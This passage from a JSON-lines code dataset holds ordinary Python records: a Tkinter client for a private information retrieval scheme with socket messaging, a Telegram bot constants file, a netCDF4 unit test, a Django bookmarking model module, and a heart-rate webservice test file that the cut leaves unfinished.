text=\"Exit \", image=self.icn_exit, width=button_width )\r\n self.btn_exit.grid(row=8,column=7, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(E))\r\n \r\n def updatDesiedBit(self,value): \r\n self.lbl_bitIndex.configure(text= str(int(float(value))))\r\n \r\n def clickConnect(self): \r\n self.pirClient.initateConnection(self.txt_SMAddress.get())\r\n \r\n \r\n \r\n \r\n def disableConnectBtn(self):\r\n self.btn_connect.state([\"disabled\"])\r\n \r\n def enableConnectBtn(self):\r\n self.btn_connect.state([\"!disabled\"])\r\n \r\n def ServerConnected_icon(self):\r\n self.lbl_connectionSts.config(image=self.icn_SM_connected)\r\n def ServerDisconnected_icon(self):\r\n self.lbl_connectionSts.config(image=self.icn_SM_disconnected)\r\n \r\n def enableScale(self):\r\n self.scl_bitChoice.state([\"!disabled\"]) # Enable the scale bar.\r\n \r\n def getCurrentScaleNum(self):\r\n return (int)(self.scl_bitChoice.get())\r\n \r\n def clickExit(self):\r\n self.myParent.destroy()\r\n \r\n def configureDBScale(self,valueToUpdate):\r\n 
self.scl_bitChoice.configure(to=valueToUpdate) \r\n        \r\n    def clickQuery(self):\r\n        if self.queryMethod.get()==1:\r\n            self.logger.info(\"PIR radio selected\")\r\n            self.pirClient.executeQuery()\r\n\r\n        elif self.queryMethod.get()==2:\r\n            self.logger.info(\"Regular radio selected\")\r\n            self.generateRegQuery()\r\n        \r\n    def writeResultToLabel(self,aResultToWrite):\r\n        self.lbl_result.configure(text=aResultToWrite,justify=LEFT) \r\n        \r\n    def showWarningPopUp(self,aTitle,aMsg):\r\n        messagebox.showwarning(aTitle,aMsg)\r\n        \r\n    def generateRegQuery(self):\r\n        self.pirClient.executeQuery()\r\n        \r\n        \r\n    def clickCompare(self):\r\n        N = 2\r\n#        queryResult = bin(int(self.lbl_result.cget(\"text\")))\r\n        results = (self.pirClient.currentQueryLength,self.pirClient.DB_LENGTH)\r\n#        queryResult = 2\r\n#        results = 10\r\n        ind = np.arange(N)    # the x locations for the groups\r\n        width = 0.1       # the width of the bars: can also be len(x) sequence\r\n\r\n        plt.bar(ind, results, width, color=['r', 'g'])  # one bar per scheme: PIR vs. regular\r\n        \r\n        plt.ylabel('Bits')\r\n        plt.title('PIR vs. non PIR data transfer')\r\n        plt.xticks(ind+width/2., ('PIR','regular') )\r\n\r\n        plt.show()\r\n        \r\n        \r\n        \r\n        \r\n        \r\n###############################################################################\r\n## PIR Algorithm functions section ##\r\n############################################################################### \r\n#    def encrypt(self,message, key=None, key_size=128):\r\n#        def pad(s):\r\n#            x = AES.block_size - len(s) % AES.block_size\r\n#            return s + (bytes([x]) * x)\r\n# \r\n#        padded_message = pad(message)\r\n#        if key is None:\r\n#            key = Random.new().read(key_size // 8)\r\n# \r\n#        cipher = AES.new(key)\r\n#        return (cipher.encrypt(padded_message)) \r\n# \r\n# \r\n#    def createRandomSeeds(self):\r\n#        global amountOfSeeds\r\n#        seedListAsBytes = []\r\n#        amountOfSeeds = int((math.sqrt(self.DB_LENGTH)-1)*(2**(self.currentServersQuantity-1)-1)+2**(self.currentServersQuantity-1))\r\n#        self.logger.info(\"amount of seeds:\",amountOfSeeds)\r\n#        for _ in range (0,amountOfSeeds):\r\n#            seedAsByte = BitArray(os.urandom(16))\r\n#            seedListAsBytes.append(seedAsByte.hex)\r\n#        return seedListAsBytes \r\n# \r\n# \r\n#    def createCWListPool(self):\r\n#        global CWListPool\r\n#        CWListPool = [] \r\n#        #tempCw = BitArray(os.urandom((int)(math.sqrt(dataBaseSizeVar)/8)))\r\n#        # CWList.append(tempCw)\r\n#        for _ in range (1,2**(self.currentServersQuantity-1)):\r\n#            tempCw = BitArray(os.urandom((int)(math.sqrt(self.DB_LENGTH)/8)))\r\n#            CWListPool.append(tempCw)\r\n#        self.logger.info(\"size of CWlist:\",CWListPool.__len__()) \r\n# \r\n# \r\n#    def convertMatrix(self,aMatrixToConvert):\r\n#        global matrixA\r\n#        global matrixB\r\n#        matrixA = []\r\n#        matrixB = []\r\n# \r\n#        for index in range (0,numRows):\r\n#            if (aMatrixToConvert[index].count(1)%2) == 0:\r\n#                matrixA.append(aMatrixToConvert[index])\r\n#            else:\r\n#                matrixB.append(aMatrixToConvert[index])\r\n#        # self.logger.info(\"matrix A\",matrixA)\r\n#        # self.logger.info(\"matrix B\",matrixB)\r\n#        t=0 \r\n#        for i in matrixA: \r\n#            t+=i[0] \r\n#        self.logger.info(\"seed per section:\",t) \r\n# \r\n# \r\n#    def buildMatrices(self):\r\n#        matrix = []\r\n#        global numRows\r\n#        numRows = 2**self.currentServersQuantity\r\n#        self.logger.info(\"#self.currentServersQuantity = %d\" %self.currentServersQuantity)\r\n#        for index in range (0,numRows):\r\n#            matrix.append([int(d) for d in bin(index)[2:].zfill(self.currentServersQuantity)])\r\n#        # self.logger.info(matrix)\r\n#        self.convertMatrix(matrix) \r\n# \r\n# \r\n#    def 
transformIndexBit(self):\r\n# global transformedRowIndex\r\n# global transformedColumnIndex\r\n# \r\n# bitToExtractIndex = int(self.scl_bitChoice.get())\r\n# transformedRowIndex = int(bitToExtractIndex/(math.sqrt(self.DB_LENGTH))) #### i'\r\n# transformedColumnIndex = int(bitToExtractIndex%(math.sqrt(self.DB_LENGTH))) #### j\r\n# \r\n# \r\n# def createGFunctions(self,aSeedList):\r\n# listOfGFunction = []\r\n# \r\n# for seed in aSeedList: \r\n# listOfGFunction.append(self.inflatorFunction(seed)) \r\n# \r\n# return listOfGFunction \r\n# \r\n# \r\n# def createEjVector(self):\r\n# global unitVectorJAsBytes\r\n# rootedDatabaseSizeVar = (int)(math.sqrt(self.DB_LENGTH))\r\n# for index in range(0,rootedDatabaseSizeVar):\r\n# if index == transformedColumnIndex:\r\n# break \r\n# unitVectorJAsBytes = BitArray(int = 1, length = rootedDatabaseSizeVar)\r\n# unitVectorJAsBytes <<= ((rootedDatabaseSizeVar-1) - index)\r\n# self.logger.info (unitVectorJAsBytes.bin)\r\n# \r\n# \r\n# def inflatorFunction(self,aSeedToInflate):\r\n# gFunction = BitArray(self.encrypt(str(0).encode('utf-8'),aSeedToInflate))\r\n# for i in range (1,(int)(math.sqrt(self.DB_LENGTH)/SEED_LENGTH)):\r\n# gFunction.append(self.encrypt(str(i).encode('utf-8'),aSeedToInflate))\r\n# return BitArray(gFunction) \r\n# \r\n# \r\n# ###############################################################################\r\n# ## Communication stuff starts here ##\r\n# ###############################################################################\r\n# \r\n# \r\n# def createTIndicatorsPool(self):\r\n# tIndicatorsPool = []\r\n# for tIndicatorIndex in range (0,2**(self.currentServersQuantity-1)):\r\n# tIndicatorsPool.append((tIndicatorIndex,tIndicatorIndex))\r\n# return tIndicatorsPool \r\n# \r\n# \r\n# def findKthCW(self,aListOfGFunction):\r\n# tempGFunctionResult = BitArray(int = 0,length = (int)(math.sqrt(self.DB_LENGTH)))\r\n# tempCWResult = BitArray(int = 0,length =(int)(math.sqrt(self.DB_LENGTH)))\r\n# \r\n# for gFunctionIndex in range (0,amountOfSeeds):\r\n# tempGFunctionResult = tempGFunctionResult ^ aListOfGFunction[gFunctionIndex]\r\n# for cwIndex in range(0,2**(self.currentServersQuantity-1)-1):\r\n# tempCWResult = tempCWResult ^ CWListPool[cwIndex]\r\n# kthCw = tempGFunctionResult ^ tempCWResult ^ unitVectorJAsBytes\r\n# self.logger.info(\"kthCW:\",kthCw)\r\n# CWListPool.append(kthCw)\r\n# \r\n# \r\n# def appendCWListPoolToQuery(self):\r\n# global serversQueryWithCWAppended \r\n# serversQueryWithCWAppended = {}\r\n# \r\n# for serversIndex in range(0,self.currentServersQuantity):\r\n# seedsList,indicatorsList = self.serversQuery[serversIndex]\r\n# serversQueryWithCWAppended[serversIndex] = (seedsList,indicatorsList,CWListPool)\r\n# self.logger.info(\"amount of CW:\",CWListPool.__len__()) \r\n# # self.logger.info(\"server query with CWListPool\",serversQueryWithCWAppended[0][2].__len__())\r\n# # self.logger.info(\"server query with CWListPool\",serversQueryWithCWAppended[1])\r\n# # self.logger.info(\"server query with CWListPool\",serversQueryWithCWAppended[2]\r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# def generatePIRQuery(self,aSeedsList,aTIndicatorsList):\r\n# targetBit = int(self.scl_bitChoice.get())\r\n# self.currentServersQuantity = active_servers.__len__()\r\n# \r\n# self.serversQuery\r\n# rootedDatabaseSizeVar = (int)(math.sqrt(self.DB_LENGTH))\r\n# # self.logger.info(\"rootedSize\",rootedDatabaseSizeVar)\r\n# # self.logger.info(\"j index:\",transformedColumnIndex)\r\n# # self.logger.info(\"i' 
index:\",transformedRowIndex)\r\n# \r\n# \r\n# tempSeedListPerSection = []\r\n# serversQuery = {}\r\n# startIndex = 0\r\n# endIndex = 0\r\n# \r\n# # self.logger.info(\"seed pool\",seedListAsBytes)\r\n# for serverAmountIndex in range(0,self.currentServersQuantity):\r\n# serversQuery[serverAmountIndex] = ([],[])\r\n# for sectionIndex in range(0,rootedDatabaseSizeVar):\r\n# seedIndex = 0\r\n# \r\n# if sectionIndex == transformedRowIndex:# important section\r\n# choosingMatrix = matrixB\r\n# importantSectionIndicator = 0\r\n# else:#not important section\r\n# choosingMatrix = matrixA\r\n# importantSectionIndicator = 1\r\n# \r\n# #prepares the indices for next withdrawal from seed pool for all runs except the first run\r\n# startIndex = endIndex\r\n# endIndex = endIndex + 2**(self.currentServersQuantity-1) - importantSectionIndicator \r\n# \r\n# if sectionIndex == 0: #first run\r\n# startIndex = 0\r\n# endIndex = 2**(self.currentServersQuantity-1)-importantSectionIndicator \r\n# \r\n# tempSeedListPerSection = aSeedsList[startIndex:endIndex]\r\n# if importantSectionIndicator == 1:# when we in a section that is not important we have an array of 2^(k-1) seeds, and we need to add another seed to be modular\r\n# tempSeedListPerSection.insert(0,0xFF)\r\n# # self.logger.info(\"choosing matrix \",choosingMatrix,\"section number:\",sectionIndex+1)\r\n# # self.logger.info(\"list for a section\",tempSeedListPerSection) \r\n# for choosingMatrixColumnIndex in choosingMatrix:\r\n# matchSeedToServerList = [i for i, j in enumerate(choosingMatrixColumnIndex) if j == 1]\r\n# # self.logger.info(\"matchedListMatrix A\",matchSeedToServerList)\r\n# for serverIndex in matchSeedToServerList:\r\n# tmpSeedList,tmpIndicatorsList = serversQuery[serverIndex]\r\n# tmpSeedList.append(tempSeedListPerSection[seedIndex])\r\n# tmpIndicatorsList.append((aTIndicatorsList[seedIndex])[0])\r\n# serversQuery[serverIndex] = (tmpSeedList,tmpIndicatorsList)\r\n# seedIndex+=1\r\n# # self.logger.info(\"server query\",serversQuery) \r\n# random.shuffle(aTIndicatorsList)\r\n# # self.logger.info(\"server query\",serversQuery[0])\r\n# # self.logger.info(\"server query\",serversQuery[1])\r\n# # self.logger.info(\"server query\",serversQuery[2])\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n# def clickQueryHandler(self):\r\n# bitToExtractIndex = int(self.scl_bitChoice.get())\r\n# \r\n# self.buildMatrices()\r\n# seedList = self.createRandomSeeds()\r\n# listOfGFuncion = self.createGFunctions(seedList)\r\n# self.transformIndexBit()\r\n# self.createCWListPool()\r\n# listOfIndicators = self.createTIndicatorsPool()\r\n# self.createEjVector()\r\n# self.findKthCW(listOfGFuncion)\r\n# self.generateQuery(seedList,listOfIndicators)\r\n# self.appendCWListPoolToQuery() \r\n \r\n \r\n \r\n \r\n \r\nclass PIRClient():\r\n \r\n clientWindowManager = None\r\n lock = RLock()\r\n frameBuilder = FrameBuilder()\r\n pirQuery = None\r\n def __init__(self,aWindowManager): \r\n logging.basicConfig(level=logging.DEBUG,format='%(name)s: %(message)s',)\r\n self.logger = logging.getLogger(\"Client\")\r\n self.clientWindowManager = aWindowManager\r\n \r\n def initateConnection(self,aSMAddress):\r\n# self.clientWindowManager.showWarningPopUp(\"connection failed\",\"asdsfd\")\r\n\r\n self.t_SMConnection = threading.Thread(target = self.connect2SM, args=(aSMAddress,))\r\n self.t_SMConnection.setDaemon(True)\r\n self.t_SMConnection.start()\r\n \r\n \r\n \r\n def connect2SM(self,aSMAddress):\r\n self.logger.debug('creating socket')\r\n soc_serverManager = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.logger.debug('connecting to server')\r\n \r\n try:\r\n\r\n soc_serverManager.connect((aSMAddress, S_M_PORT))\r\n self.saveServerDetails((aSMAddress,S_M_PORT,soc_serverManager)) ##tuple format: (IP, PORT, Active Socket)\r\n\r\n self.sayHelloToSM()\r\n self.getDBLength()\r\n self.getSTDservers()\r\n \r\n self.clientWindowManager.enableScale() \r\n self.clientWindowManager.disableConnectBtn()\r\n except OSError: \r\n self.logger.debug('connection failed')\r\n \r\n\r\n ##TODO move this.\r\n# soc_serverManager.send(self.frameBuilder.getFrame()) ##\r\n# self.readSocketForResponse(soc_serverManager)\r\n def calacLengthSent(self,queryToSend):\r\n self.currentQueryLength = self.pirQuery.calacQuerySize()\r\n \r\n \r\n def pushServersAndQueriesToSendIntoQueue(self,queriesToSend):\r\n serversPool.queue.clear()\r\n serversQueryReply.clear()\r\n# while serversPool.qsize() != 0:\r\n# serversPool.get_nowait()\r\n self.verifyServersAlive()\r\n for serverIndex in range(0,active_servers.__len__()):\r\n queryAsString = pickle.dumps(queriesToSend[serverIndex])\r\n# self.logger.info(\"Pickle query: %s type: %s\",queryAsString,type(queryAsString))\r\n serversPool.put((active_servers[serverIndex][2],queryAsString))\r\n \r\n \r\n\r\n def executeQuery(self):\r\n \r\n \r\n self.pirQuery = PIRQueryObject(self.currentServersQuantity,self.DB_LENGTH)\r\n self.logger.info(\"Requested bit: %d\", self.clientWindowManager.getCurrentScaleNum())\r\n queryToSend = self.pirQuery.getPIRQuery(self.clientWindowManager.getCurrentScaleNum())\r\n self.calacLengthSent(queryToSend)\r\n# self.logger.info(\"query to send 0: %s\",queryToSend[0])\r\n# self.logger.info(\"query to send 1: %s\",queryToSend[1])\r\n\r\n self.pushServersAndQueriesToSendIntoQueue(queryToSend)\r\n for _ in queryToSend:\r\n# serverTuple = active_servers[targetServer]\r\n# avtiveTargetSocket = serverTuple[2]\r\n worker = Thread(target=self.sendQueries)\r\n# self.logger.info(\"Worker %s: created, connected to %s:%s\",worker.getName(),serverTuple[0],serverTuple[1])\r\n worker.setDaemon(True)\r\n worker.start()\r\n# worker.join()\r\n serversPool.join()\r\n# self.logger.info(\"All threads returned\")\r\n if(serversQueryReply.__len__() == active_servers.__len__()):\r\n self.logger.info(\"All servers replied to the query\")\r\n \r\n desiredBit = self.pirQuery.calculateQueryResult(serversQueryReply)\r\n self.logger.info(\"List of responses: %s\",serversQueryReply)\r\n\r\n self.clientWindowManager.writeResultToLabel(desiredBit)\r\n \r\n \r\n \r\n def verifyServersAlive(self):\r\n serversToRemovePool = []\r\n for (serverKey,(_,_,currentServer)) in active_servers.items():\r\n self.logger.info(\"Check server: %s alive\",serverKey)\r\n try:\r\n self.sayHelloToServer(currentServer)\r\n except Exception:\r\n self.logger.info(\"server: %s is not present, removed\",serverKey)\r\n serversToRemovePool.append(serverKey)\r\n for server2Remove in serversToRemovePool:\r\n del active_servers[server2Remove]\r\n \r\n def readSocketForResponse(self,runnigSocket):\r\n cur_thread = threading.currentThread()\r\n\r\n while True:\r\n # Echo the back to the client\r\n try:\r\n data = runnigSocket.recv(2)\r\n if data == '' or len(data) == 0:\r\n break\r\n except Exception: \r\n self.logger.debug('recv failed opcode and num bytes of Length')\r\n break\r\n #Got data Successfully\r\n self.recvOpcode = data[0] #first byte is op code\r\n lengthOfSize = data[1]\r\n try:\r\n data = runnigSocket.recv(lengthOfSize)\r\n if data == '' or len(data) == 
0:\r\n break\r\n except Exception: \r\n self.logger.debug('recv data failed size')\r\n break\r\n size = int.from_bytes (data,byteorder='big')\r\n try:\r\n data = runnigSocket.recv(size)\r\n if data == '' or len(data) == 0:\r\n break\r\n except Exception: \r\n self.logger.debug('recv data failed payload')\r\n break\r\n self.payload = data\r\n self.logger.info(\"%s Received: %s %s\",cur_thread.getName(),self.recvOpcode,self.payload )\r\n self.reponseHandler(self.recvOpcode,self.payload)\r\n break\r\n \r\n def reponseHandler(self,recvOpcode,msg):\r\n self.code = OpCodes.getCode(self, self.recvOpcode)\r\n \r\n if self.code == 'hello_ack':\r\n self.logger.info (self.code)\r\n self.clientWindowManager.ServerConnected_icon()\r\n elif self.code == 'server_quantity_reply':\r\n self.logger.info (self.code)\r\n self.handleQuantityReply(msg)\r\n elif self.code == 'servers_up':\r\n self.logger.info (self.code)\r\n elif self.code == 'servers_failed':\r\n self.logger.info (self.code)\r\n elif self.code == 'db_length':\r\n self.logger.info (self.code)\r\n self.handleDBLengthReply(msg)\r\n elif self.code == 'pir_query_reply':\r\n self.logger.info (self.code)\r\n self.handleQueryReply(msg) \r\n elif self.code == 'std_query_reply':\r\n self.logger.info (self.code)\r\n self.handleQueryReply(msg)\r\n elif self.code == 'ip_and_port_reply':\r\n self.logger.info (self.code)\r\n self.handleIpAndPortReply(msg)\r\n else:\r\n self.logger.info(\"Bad opCode\") \r\n \r\n \r\n def sayHelloToSM(self):\r\n self.frameBuilder.assembleFrame(codes.getValue('client_hello')[0],\"client says hello\")\r\n# self.frameBuilder.assembleFramePickle(codes.getValue('client_hello')[0],\"client says hello\")\r\n# self.logger.info(\"Say hello frame: %s \",self.frameBuilder.getFramePickle())\r\n self.sendAndHandleResponse(active_servers[0][2]) \r\n \r\n def sayHelloToServer(self,activeTargetSocket):\r\n self.frameBuilder.assembleFrame(codes.getValue('client_hello')[0],\"client says hello\")\r\n self.sendAndHandleResponse(activeTargetSocket) \r\n \r\n def getSTDservers(self):\r\n self.frameBuilder.assembleFrame(codes.getValue('server_quantity_request')[0],\"server currentServersQuantity request\")\r\n self.sendAndHandleResponse(active_servers[0][2])\r\n \r\n def getDBLength(self):\r\n self.frameBuilder.assembleFrame(codes.getValue('db_length_request')[0],\"DB length request\")\r\n self.sendAndHandleResponse(active_servers[0][2])\r\n\r\n def sendQueries(self):\r\n t_frameBuilder = FrameBuilder()\r\n while True:\r\n# self.logger.info('%s Fetching socket from to queue ',threading.currentThread().getName())\r\n (targetSocket,query2Send) = serversPool.get(True)\r\n self.logger.info(\"length of query to send %d\",len(query2Send))\r\n# self.lock.acquire(blocking=True)\r\n t_frameBuilder.assembleFrame(codes.getValue('pir_query')[0],query2Send)\r\n# self.lock.release()\r\n targetSocket.send(t_frameBuilder.getFrame())\r\n self.readSocketForResponse(targetSocket)\r\n# self.sendAndHandleResponse(targetSocket)\r\n serversPool.task_done()\r\n \r\n def sendAndHandleResponse(self,activeSocket):\r\n activeSocket.send(self.frameBuilder.getFrame())\r\n# activeSocket.send(pickle.dump(self.frameBuilder.getFramePickle()),flags=0)\r\n self.readSocketForResponse(activeSocket)\r\n \r\n \r\n \r\n###############################################################################\r\n## Handling functions in this section ##\r\n############################################################################### \r\n def handleQuantityReply(self,msg):\r\n 
self.currentServersQuantity = int(msg)\r\n soc_serverManager = active_servers[0][2]\r\n for currentServer in range(1, self.currentServersQuantity):\r\n self.frameBuilder.assembleFrame(codes.getValue('ip_and_port_request')[0],str(currentServer))\r\n soc_serverManager.send(self.frameBuilder.getFrame())\r\n self.readSocketForResponse(soc_serverManager)\r\n self.currentServersQuantity = active_servers.__len__()\r\n \r\n def saveServerDetails(self,serverCredential):\r\n self.lock.acquire(blocking=True)\r\n active_servers[active_servers.__len__()] = serverCredential\r\n self.lock.release()\r\n \r\n def handleIpAndPortReply(self,msg):\r\n modifiedMsg = msg.decode('utf-8')\r\n try:\r\n index,stdIP,stdPort = modifiedMsg.split(':',3)\r\n except Exception: \r\n self.logger.debug('Bad ipAndPortRequest format')\r\n \r\n soc_stdServer=self.connect2Target((stdIP,int(stdPort)))\r\n self.sayHelloToServer(soc_stdServer) \r\n self.lock.acquire(blocking=True)\r\n active_servers[int(index)] = (stdIP,int(stdPort),soc_stdServer)\r\n self.lock.release()\r\n self.logger.debug('STD Server:%s on Port:%s was added in index:%s ', stdIP,stdPort,str(index))\r\n \r\n def handleQueryReply(self,msg):\r\n serversQueryReply.append(int(msg))\r\n \r\n def handleDBLengthReply(self,msg):\r\n modifiedMsg = msg.decode('utf-8')\r\n self.DB_LENGTH = int(modifiedMsg)\r\n self.clientWindowManager.configureDBScale(self.DB_LENGTH-1)\r\n self.logger.info('Data base size is updated to:%s',self.DB_LENGTH )\r\n\r\n def connect2Target(self,tu_address):\r\n self.logger.debug('creating socket connection to %s' , tu_address)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n s.connect(tu_address)\r\n return s\r\n# connectedFlag = True\r\n except Exception: \r\n self.logger.debug('connection to %s failed',tu_address)\r\n \r\n \r\n def setSMIPAdress(self,aIPAdress):\r\n pass\r\n \r\nif __name__ == \"__main__\":\r\n# logger = logging.getLogger('Client')\r\n root = Tk()\r\n appWindownManager = client_window(root)\r\n root.mainloop()\r\n# logger = logging.getLogger(\"Client computer\")\r\n# \r\n# # while True:\r\n# # sleep(1)\r\n# # self.logger.info(int(time.time()%1000000))\r\n# # \r\n# \r\n# s_c = ('123',344)\r\n# a_s = {1: ('123',344),2:('345',1254667)}\r\n# whatreturned = [ k for k, element in a_s.items() if element == s_c]\r\n# for key, element in a_s.items(): \r\n# self.logger.info(key,element)\r\n# \r\n# \r\n# \r\n# # p_bitstring = BitArray(hex(random.getrandbits(2**20)))\r\n# # logger.debug('BitArray s: %s' ,p_bitstring)\r\n# \r\n# frameBuilder = FrameBuilder()\r\n# ip, port = '192.168.4.1', 31101\r\n# # self.logger.info (codes.get_code(b'242'))\r\n# \r\n# logger.info('Server on %s:%s', ip, port)\r\n# \r\n# # Connect to the server\r\n# logger.debug('creating socket')\r\n# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# logger.debug('connecting to server')\r\n# connectedFlag = True\r\n# try:\r\n# s.connect((ip, port))\r\n# except Exception: \r\n# logger.debug('connection failed')\r\n# connectedFlag = False\r\n# frameBuilder.assembleFrame(codes.getValue('clientHello')[0],\"dfgsdf\")\r\n# s.send(frameBuilder.getFrame())\r\n# while connectedFlag:\r\n# \r\n# message = input(\"Enter your message to the EchoServer: \")\r\n# # self.logger.info (codes.getValue('db_length')[0])\r\n# frameBuilder.assembleFrame(codes.getValue('clientHello')[0],message)\r\n# # my_bytes.append(245)\r\n# # my_bytes.append(len(message))\r\n# # my_bytes.extend(str.encode(message))\r\n# logger.debug('sending data: \"%s\"', message)\r\n# len_sent 
= s.send(frameBuilder.getFrame())\r\n# #        len_sent = s.send('240')\r\n# \r\n#        # Receive a response\r\n#        logger.debug('waiting for response')\r\n#        response = s.recv(len_sent + len(threading.currentThread().getName()) + 3)\r\n#        logger.debug('response from server: \"%s\"', response)\r\n#        # self.logger.info('response from server: ', response.encode(\"utf-8\"))\r\n#        sleep(0.05)\r\n# #        connectedFlag = False\r\n# \r\n#    # Clean up\r\n#    logger.debug('closing socket')\r\n#    s.close()\r\n#    logger.debug('Client done')\r\n\r\n    \r\n    \r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"173707354","text":"temperature_button = u\"\\U0001F321\" + \"Temperature\"\nget_status_button = u\"\\U0001F49A\" + \"Get Status\"\nset_status_button = u\"\\U0001F9E1\" + \"Set Status\"\nenable_hurt_button = u\"\\U0001F494\" + \"Enable Hurt\"\ndisable_hurt_button = u\"\\U00002764\" + \"Disable Hurt\"\nwallet_button = u\"\\U0001F4B0\" + \"Wallet\"\ndaily_zeit_button = u\"\\U0000231A\" + \"Daily Zeit\"\nget_photo_button = u\"\\U0001F4F8\" + \"Get Photo\"\nday_deal_button = u\"\\U0001F4B9\" + \"Day Deal\"\nweek_deal_button = u\"\\U0001F911\" + \"Week Deal\"\ngerman_button = u\"\\U0001F468\" + \"German\"\ndigitec_deal_button = u\"\\U0001F4BB\" + \"Digitec Deal\"\n\nback_button = u\"\\U0001F448\" + \" Back\"\nnext_button = u\"\\U0001F449\" + \" Next\"\n\nnot_enough_permissions = \"You are not authorized\"\nnot_yet_in_production = \"I'm sorry but this feature is not yet in production\"\n\nSTART_MENU_RESULT, SECOND_PAGE_RESULT, THIRD_PAGE_RESULT = range(3)\n","sub_path":"bin/utils/Constant.py","file_name":"Constant.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"563630484","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport unittest\nimport tempfile\nimport netCDF4\n\nclass test_filepath(unittest.TestCase):\n\n    def setUp(self):\n        self.netcdf_file = os.path.join(os.getcwd(), \"netcdf_dummy_file.nc\")\n        self.nc = netCDF4.Dataset(self.netcdf_file)\n\n    def test_filepath(self):\n        assert self.nc.filepath() == str(self.netcdf_file)\n\n    def test_filepath_with_non_ascii_characters(self):\n        python3 = sys.version_info[0] > 2\n        if python3:\n            encoding = 'utf-8'\n        else:\n            encoding = 'mbcs'\n        # create nc-file in a filepath with Non-Ascii-Characters\n        tempdir = tempfile.mkdtemp(prefix=u'ÄÖÜß_')\n        filename = u\"Besançonalléestraße.nc\"\n        nc_non_ascii_file = os.path.join(tempdir, filename)\n        try:\n            nc_non_ascii = netCDF4.Dataset(nc_non_ascii_file, 'w')\n        except OSError:\n            msg = u'cannot create file {} in folder {}\\n using encoding: {}'.format(\n                filename, tempdir, encoding)\n            raise OSError(msg)\n        \n        # test that no UnicodeDecodeError occurs in the filepath() method\n        msg = u'original: {}\\nfilepath: {}'.format(\n            nc_non_ascii_file,\n            nc_non_ascii.filepath())\n        assert nc_non_ascii.filepath() == nc_non_ascii_file, msg\n        \n        # cleanup\n        nc_non_ascii.close()\n        os.remove(nc_non_ascii_file)\n        os.rmdir(tempdir)\n        \n        \nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test/tst_filepath.py","file_name":"tst_filepath.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"349049968","text":"from django.db import models\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.http import urlquote\nfrom django.utils.translation import ugettext as _\n\nDEFAULT_VISITS = 0\n\nSTATUS_CHOICES = (\n    (1, 'Inactive'),\n    (2, 'Active'),\n)\n\nurl_help = \"\"\"\nNot a formal URL field. This accepts a string which will have string formatting operations performed on it. Valid key \nmappings for the string formatting include:\n<ul>\n    <li><strong>%(url)s</strong> Url to be provided to social bookmarking service</li>\n    <li><strong>%(title)s</strong> Title of object being submitted to social bookmarking service</li> \n    <li><strong>%(description)s</strong> Summary or description of the object being submitted</li> \n</ul>\n\"\"\"\n\nimage_help = \"\"\"\nBookmark image icon stored in the media/social_bookmarking/img folder. Stored there so it is easier to install with fixtures.\n\"\"\"\n\njs_help = \"\"\"\nJavascript placed here will be inserted in the page in a <script></script> body. Lines will be stripped so make sure that \nyou end your lines of code correctly.\n\"\"\"\n\nclass BookmarkManager(models.Manager):\n    \"\"\"\n    QuerySet for all active bookmarks.\n    \"\"\"\n    def get_active(self):\n        return self.get_query_set().filter(status=2)\n\nclass Bookmark(models.Model):\n    title = models.CharField(max_length=255, blank=False)\n    slug = models.SlugField(_('slug'))\n    status = models.IntegerField(choices=STATUS_CHOICES, default=2) \n    description = models.CharField(max_length=255, blank=True, help_text=_(\"Because some things want it\"))\n    url = models.CharField(blank=False, max_length=255, help_text=_(url_help))\n    image = models.CharField(help_text=_(image_help), max_length=100, blank=False)\n    js = models.TextField(help_text=_(js_help), blank=True)\n    \n    objects = BookmarkManager()\n    \n    class Meta:\n        ordering = ('title',)\n\n    def __unicode__(self):\n        return unicode(self.title)\n\nclass BookmarkRelated(models.Model):\n    content_type = models.ForeignKey(ContentType)\n    object_id = models.PositiveIntegerField()\n    content_object = generic.GenericForeignKey('content_type', 'object_id')\n    bookmark = models.ForeignKey(Bookmark, blank=False, null=False)\n    visits = models.IntegerField(_('visits'), default=DEFAULT_VISITS, editable=False)","sub_path":"social_bookmarking/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"127509475","text":"from webservice import calculate_average, diagnosis, check_input\nimport pytest\nimport math\n\n\ndef test_calculate_average():\n\n    output_1 = calculate_average([10, 20, 30])\n    assert output_1 == 20\n\n    output_2 = calculate_average([50, 76, 82, 99, 43, 46, 76, 35])\n    assert output_2 == 63.375\n\n\ndef test_diagnosis():\n\n    output_3 = diagnosis(120)\n    assert output_3 == \"Tachycardia\"\n\n    output_4 = diagnosis(100)\n    assert output_4 == \"Normal\"\n\n    output_5 = diagnosis(61)\n    assert output_5 == \"Normal\"\n\n    output_6 = diagnosis(45)\n    assert output_6 == \"Bradycardia\"\n\n\ndef test_check_input():\n\n    input_7 = {\n        \"user_email\": \"suyash@suyashkumar.com\",\n        \"user_age\": 50,\n        \"heart_rate\": 100\n    }\n\n    output_7 = check_input(input_7)\n    assert output_7 is True\n\n    input_8 = {\n        \"user_email\": \"suyash@suyashkumar.com\",\n        \"user_age\": \"50\",\n        \"heart_rate\": \"100\"\n    }\n\n    output_8 = check_input(input_8)\n    assert output_8 is True\n\n    input_9 = {\n        \"user_age\": 50,\n        \"heart_rate\": 100\n    }\n\n    # a missing key should raise KeyError inside check_input\n    with pytest.raises(KeyError):\n        check_input(input_9)\n\n    input_10 = {\n        \"user_email\": 45,\n        